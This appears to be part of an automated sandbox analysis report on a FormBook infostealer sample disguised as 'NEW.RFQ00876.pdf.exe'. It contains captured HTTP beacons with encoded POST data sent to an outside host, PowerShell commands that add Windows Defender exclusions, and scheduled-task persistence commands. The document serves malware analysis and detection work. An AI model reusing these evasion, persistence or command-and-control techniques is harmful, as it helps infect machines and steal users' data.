                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1624&min_rtt=1624&rtt_var=812&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1862&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 32 32 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                                  Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE
                                                                                  Dec 9, 2024 07:00:19.388874054 CET | 110 | IN | Data Raw: 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65
                                                                                  Data Ascii: and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  44 | 192.168.2.7 | 50021 | 172.67.215.235 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 9, 2024 07:00:20.791956902 CET | 560 | OUT | GET /gvzg/?PHM8hj-=3ZtrxXVK8OpQj/Id+SsCZR/FL5/Fz5CPqtakmq6NsaDAWPHTfqsTRo2NSgZOgOtgjwZcpccTv84fMQQl56Kttpvgnc7345UpTfNvcW90g2TqWWaj2VNxmTxTXc1CDHCPjDNjR8Ywq9s3&tHfx=9byl HTTP/1.1
                                                                                  Host: www.airrelax.shop
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Dec 9, 2024 07:00:22.050440073 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                  Date: Mon, 09 Dec 2024 06:00:21 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Last-Modified: Fri, 25 Oct 2024 07:07:09 GMT
                                                                                  Vary: Accept-Encoding
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dh8pRCmJ9wzbBH2kBSLCmJYeUh5ip957edlxIpNEYmVsLPqLVXTN2qL0PnP5oj8BrXkZM%2F1dGhJkusRmxnfD3HOI%2FHYgQVq5tBRRCUtY935BtySRcTb1C3awjUtvlE6jVRzAiQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ef2c63fabbf423f-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1585&min_rtt=1585&rtt_var=792&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=560&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 35 36 62 38 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 0a 09 09 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 2c 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 22 3e 0a 09 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 [TRUNCATED]
                                                                                  Data Ascii: 56b8<html lang=""><head><meta charset="utf-8"><meta name="viewport"content="width=device-width,initial-scale=1,maximum-scale=1,minimum-scale=1,user-scalable=no,viewport-fit=cove" /><meta http-equiv="X-UA-Compatible" content="IE=edge"><link rel="icon" href="favicon.ico"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="yes" name="apple-touch-fullscreen"><titl
                                                                                  Dec 9, 2024 07:00:22.050472975 CET | 1236 | IN | Data Raw: 65 3e 61 63 74 69 6f 6e 61 72 65 6e 61 2e 74 6f 70 3a 20 57 68 65 72 65 20 68 61 70 70 69 6e 65 73 73 20 6d 65 65 74 73 20 69 6e 6e 6f 76 61 74 69 6f 6e 20 7c 20 4f 6e 6c 69 6e 65 20 47 61 6d 65 20 7c 20 46 72 65 65 20 47 61 6d 65 3c 2f 74 69 74
                                                                                  Data Ascii: e>actionarena.top: Where happiness meets innovation | Online Game | Free Game</title><link href="css/chunk-common.2627b58b.css" rel="preload" as="style"><link href="css/chunk-vendors.df919975.css" rel="preload" as="style"><link href="css
                                                                                  Dec 9, 2024 07:00:22.050487041 CET | 1236 | IN | Data Raw: 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 67 6f 6f 67 6c 65 74 61 67 2e 70 75 62 61 64 73 28 29 2e 65 6e 61 62 6c 65 53 69 6e 67 6c 65 52 65 71 75 65 73 74 28 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 67 6f 6f 67 6c 65 74 61 67 2e 65 6e 61 62
                                                                                  Data Ascii: ; googletag.pubads().enableSingleRequest(); googletag.enableServices(); }); </script> adEnd--><script>window.aiptag = window.aiptag || {cmd: []};aiptag.cmd.display = aiptag.cmd.display || [];a
                                                                                  Dec 9, 2024 07:00:22.050553083 CET | 1236 | IN | Data Raw: 0a 09 09 09 69 66 20 28 74 79 70 65 6f 66 20 61 69 70 74 61 67 2e 61 64 70 6c 61 79 65 72 20 21 3d 3d 20 27 75 6e 64 65 66 69 6e 65 64 27 29 20 7b 0a 09 09 09 09 61 69 70 74 61 67 2e 63 6d 64 2e 70 6c 61 79 65 72 2e 70 75 73 68 28 66 75 6e 63 74
                                                                                  Data Ascii: if (typeof aiptag.adplayer !== 'undefined') {aiptag.cmd.player.push(function() { aiptag.adplayer.startVideoAd(); });} else {//Adlib didnt load this could be due to an adblocker, timeout etc.//Please add your script here
                                                                                  Dec 9, 2024 07:00:22.050565958 CET | 1236 | IN | Data Raw: 09 09 09 09 09 09 48 6f 6d 65 0a 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 61 3e 0a 09 09 09 3c 61 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 20 68 72 65 66 3d 22 73 65 61 72 63 68 2e 68
                                                                                  Data Ascii: Home</span></div></a><a data-v-49759819="" href="search.html?type=Popular" class="type_item" style="display: none;"></a><a data-v-49759819="" href="search.html?type=Girls" class="type_item"><div data-v-497
                                                                                  Dec 9, 2024 07:00:22.050575972 CET | 1236 | IN | Data Raw: 74 79 70 65 3d 52 61 63 69 6e 67 22 20 63 6c 61 73 73 3d 22 74 79 70 65 5f 69 74 65 6d 22 3e 0a 09 09 09 09 3c 64 69 76 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 3e 0a 09 09 09 09 09 3c 69 6d 67 20 64 61 74 61 2d 76 2d 34 39 37 35
                                                                                  Data Ascii: type=Racing" class="type_item"><div data-v-49759819=""><img data-v-49759819="" alt="" src="img/racing.1bfb9b83.png" data-src="img/racing.1bfb9b83.png"style="width: 1.5rem; height: 1.5rem;"><span data-v-49759819="" class
                                                                                  Dec 9, 2024 07:00:22.050604105 CET | 1236 | IN | Data Raw: 72 65 6d 3b 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 20 63 6c 61 73 73 3d 22 69 74 65 6d 5f 6e 61 6d 65 22 3e 0a 09 09 09 09 09 09 53 70 6f 72 74 73 0a 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a
                                                                                  Data Ascii: rem;"><span data-v-49759819="" class="item_name">Sports</span></div></a><a data-v-49759819="" href="search.html?type=Action" class="type_item"><div data-v-49759819=""><img data-v-49759819="" alt="" sr
                                                                                  Dec 9, 2024 07:00:22.050723076 CET | 1236 | IN | Data Raw: 72 22 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 22 3e 0a 09 09 09 09 3c 64 69 76 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 20 63 6c 61 73 73 3d 22 6d 65 6e 75 22 3e 0a 09 09 09 09 09 3c 73 76 67 20 64 61 74 61 2d 76 2d 34 39 37 35
                                                                                  Data Ascii: r" class="header"><div data-v-49759819="" class="menu"><svg data-v-49759819="" t="1687244222935" viewBox="0 0 1024 1024" version="1.1"xmlns="http://www.w3.org/2000/svg" p-id="19883" xmlns:xlink="http://www.w3.org/1999/xlink"
                                                                                  Dec 9, 2024 07:00:22.050750017 CET | 1236 | IN | Data Raw: 09 09 3c 61 20 64 61 74 61 2d 76 2d 34 39 37 35 39 38 31 39 3d 22 22 20 68 72 65 66 3d 22 73 65 61 72 63 68 2e 68 74 6d 6c 3f 71 3d 22 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 22 3e 0a 09 09 09 09 09 3c 73 76 67 20 64 61 74 61 2d 76 2d 34 39 37
                                                                                  Data Ascii: <a data-v-49759819="" href="search.html?q=" class="search"><svg data-v-49759819="" t="1687244550911" viewBox="0 0 1024 1024" version="1.1"xmlns="http://www.w3.org/2000/svg" p-id="3078" data-spm-anchor-id="a313x.7781069.0.i2"
                                                                                  Dec 9, 2024 07:00:22.050764084 CET | 1236 | IN | Data Raw: 70 75 74 20 64 61 74 61 2d 76 2d 30 35 34 34 37 39 33 66 3d 22 22 20 74 79 70 65 3d 22 74 65 78 74 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 69 6e 70 75 74 20 74 68 65 20 6b 65 79 77 6f 72 64 73 22 20 63 6c 65 61 72 61 62 6c 65 3d 22 22 20 64
                                                                                  Data Ascii: put data-v-0544793f="" type="text" placeholder="input the keywords" clearable="" defaultvalue=""><div data-v-0544793f=""><svg data-v-0544793f="" t="1680079992751" viewBox="0 0 1024 1024" version="1.1"xmlns="http://www.w3.org/
                                                                                  Dec 9, 2024 07:00:22.170301914 CET | 1236 | IN | Data Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 61 64 45 6e 64 2d 2d 3e 0a 09 09 09 09 09 3c 64 69 76 20 69 64 3d 27 61 63 74 69 6f 6e 61 72 65 6e 61 2d 74 6f 70 5f 33 30 30 78 32 35 30 27 3e 0a 09 09 09 09 09 3c 73 63 72 69 70 74
                                                                                  Data Ascii: adEnd--><div id='actionarena-top_300x250'><script type='text/javascript'>aiptag.cmd.display.push(function() { aipDisplayTag.display('actionarena-top_300x250'); });</script></div><div


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  45 | 192.168.2.7 | 50022 | 172.67.145.234 | 80 | 5412 | C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 9, 2024 07:00:27.745157957 CET | 817 | OUT | POST /ge5i/ HTTP/1.1
                                                                                  Host: www.vayui.top
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.vayui.top
                                                                                  Referer: http://www.vayui.top/ge5i/
                                                                                  Content-Length: 220
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 75 4e 38 55 45 2f 47 2b 45 4c 69 44 4f 5a 65 47 78 7a 45 78 6a 33 74 75 61 79 4b 42 53 65 6e 77 50 6a 31 4c 78 57 2f 36 75 48 2b 45 6f 4a 32 2f 75 68 39 79 63 6f 54 52 63 32 38 33 61 4a 32 71 66 77 69 53 2f 54 6e 6a 6e 62 73 70 6f 55 6f 58 4d 69 47 49 67 78 4e 33 76 58 71 56 6a 41 66 6c 55 32 51 4e 33 4c 46 4a 33 57 48 49 51 59 74 37 46 67 42 38 37 48 42 48 53 67 34 6d 36 64 73 6b 44 4a 67 57 52 50 41 67 6e 71 4b 61 46 38 78 57 2b 69 34 33 73 4a 57 6b 71 2f 56 32 2f 64 76 67 36 61 7a 36 51 77 65 6e 67 4c 53 49 6a 6b 6c 30 4a 47 32 6a 6a 35 70 6a 74 73 74 4a 61 63 2b 69 78 73 74 56 54 32 4c 34 32 54 51 54 4e 2f 69 4d 57 77 3d 3d
                                                                                  Data Ascii: PHM8hj-=uN8UE/G+ELiDOZeGxzExj3tuayKBSenwPj1LxW/6uH+EoJ2/uh9ycoTRc283aJ2qfwiS/TnjnbspoUoXMiGIgxN3vXqVjAflU2QN3LFJ3WHIQYt7FgB87HBHSg4m6dskDJgWRPAgnqKaF8xW+i43sJWkq/V2/dvg6az6QwengLSIjkl0JG2jj5pjtstJac+ixstVT2L42TQTN/iMWw==
                                                                                  Dec 9, 2024 07:00:28.970876932 CET | 964 | IN | HTTP/1.1 404 Not Found
                                                                                  Date: Mon, 09 Dec 2024 06:00:28 GMT
                                                                                  Content-Type: text/html
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5n9htlE53RLATzMY9d8jJAh1SDks7HYQydUImQswIagl3ykdUIVmDAQ2hGQSTO39Q%2Baqsar64qYuG%2Fa4JT6pkJs7EhOa2D8rPEQskYrd%2BEgAz6vQ58eQ2sccnuwL5N2Z"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ef2c66b2aea7c87-EWR
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1965&min_rtt=1965&rtt_var=982&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=817&delivery_rate=0&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 85 de 61 3c 40 88 85 2e 87 6c 44 c1 85 6e 3c 41 ea 8c 4d 20 9d 94 31 82 bd bd 54 2d 88 6b 97 ae 1e bc 9f 8f 87 a1 0c c9 d5 15 06 f6 e4 b0 c4 92 d8 b5 eb 16 8e b9 c0 2e df 84 d0 be 4c b4 cf 4a 5d 61 97 69 9a f5 cc 52 58 1d 86 e6 7b 11 1a 87 f6 1d cf 6c 75 4b 59 fa 28 f7 cf cc 2e 34 bb 3c 59 19 03 1e 46 4f 14 a5 87 92 81 e2 d5 77 89 e1 70 da 6f c1 0b c1 26 68 1e 18 2e 1a 59 28 4d c0 aa 59 61 f4 3d 83 31 7f c4 af 11 0f 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: a7M0a<@.lDn<AM 1T-k.LJ]aiRX{luKY(.4<YFOwpo&h.Y(MYa=1'$0


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                  46 | 192.168.2.7 | 50023 | 172.67.145.234 | 80
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Dec 9, 2024 07:00:32.115936041 CET | 837 | OUT | POST /ge5i/ HTTP/1.1
                                                                                  Host: www.vayui.top
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.vayui.top
                                                                                  Referer: http://www.vayui.top/ge5i/
                                                                                  Content-Length: 240
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 75 4e 38 55 45 2f 47 2b 45 4c 69 44 49 35 4f 47 79 53 45 78 32 48 74 74 55 53 4b 42 59 2b 6d 35 50 6a 70 4c 78 58 4b 68 75 54 53 45 6f 6f 6d 2f 70 6b 4a 79 5a 6f 54 52 58 57 38 76 55 70 32 78 66 77 76 78 2f 58 37 6a 6e 61 4d 70 6f 52 45 58 4e 52 2b 4a 69 68 4e 31 75 6e 71 74 39 77 66 6c 55 32 51 4e 33 50 74 76 33 58 76 49 54 6f 39 37 46 42 42 7a 33 6e 42 49 56 67 34 6d 2b 64 73 67 44 4a 68 73 52 4f 73 4b 6e 73 47 61 46 38 68 57 2f 7a 34 30 31 35 57 2b 6e 66 55 66 33 64 32 56 7a 35 50 48 5a 52 4b 67 69 4c 32 72 76 79 6b 57 54 6b 36 50 39 6f 52 59 70 75 4a 2f 4e 36 6a 58 7a 74 70 4e 65 55 2f 5a 70 6b 31 35 41 74 44 49 41 4e 57 47 52 72 47 59 78 45 4c 36 4e 35 75 39 4b 42 69 75 65 52 77 3d
                                                                                  Data Ascii: PHM8hj-=uN8UE/G+ELiDI5OGySEx2HttUSKBY+m5PjpLxXKhuTSEoom/pkJyZoTRXW8vUp2xfwvx/X7jnaMpoREXNR+JihN1unqt9wflU2QN3Ptv3XvITo97FBBz3nBIVg4m+dsgDJhsROsKnsGaF8hW/z4015W+nfUf3d2Vz5PHZRKgiL2rvykWTk6P9oRYpuJ/N6jXztpNeU/Zpk15AtDIANWGRrGYxEL6N5u9KBiueRw=


                                                                                  Target ID:0
                                                                                  Start time:00:56:20
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe"
                                                                                  Imagebase:0xf80000
                                                                                  File size:817'160 bytes
                                                                                  MD5 hash:198FADC2115110C8B0B774C88C70215E
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:3
                                                                                  Start time:00:56:21
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe"
                                                                                  Imagebase:0xa70000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:4
                                                                                  Start time:00:56:21
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff75da10000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:5
                                                                                  Start time:00:56:21
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe"
                                                                                  Imagebase:0xa70000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:6
                                                                                  Start time:00:56:21
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff75da10000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:11
                                                                                  Start time:00:56:24
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                  Imagebase:0x7ff7fb730000
                                                                                  File size:496'640 bytes
                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:13
                                                                                  Start time:00:56:25
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmpEC94.tmp"
                                                                                  Imagebase:0x700000
                                                                                  File size:187'904 bytes
                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:14
                                                                                  Start time:00:56:25
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff75da10000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:15
                                                                                  Start time:00:56:25
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe"
                                                                                  Imagebase:0xc10000
                                                                                  File size:817'160 bytes
                                                                                  MD5 hash:198FADC2115110C8B0B774C88C70215E
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.1463779595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.1464634717.00000000016C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.1467457983.0000000002570000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:20
                                                                                  Start time:00:56:28
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe
                                                                                  Imagebase:0x350000
                                                                                  File size:817'160 bytes
                                                                                  MD5 hash:198FADC2115110C8B0B774C88C70215E
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 50%, ReversingLabs
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:21
                                                                                  Start time:00:56:32
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RAangyFeHdZLco" /XML "C:\Users\user\AppData\Local\Temp\tmp78E.tmp"
                                                                                  Imagebase:0x700000
                                                                                  File size:187'904 bytes
                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:22
                                                                                  Start time:00:56:32
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff75da10000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
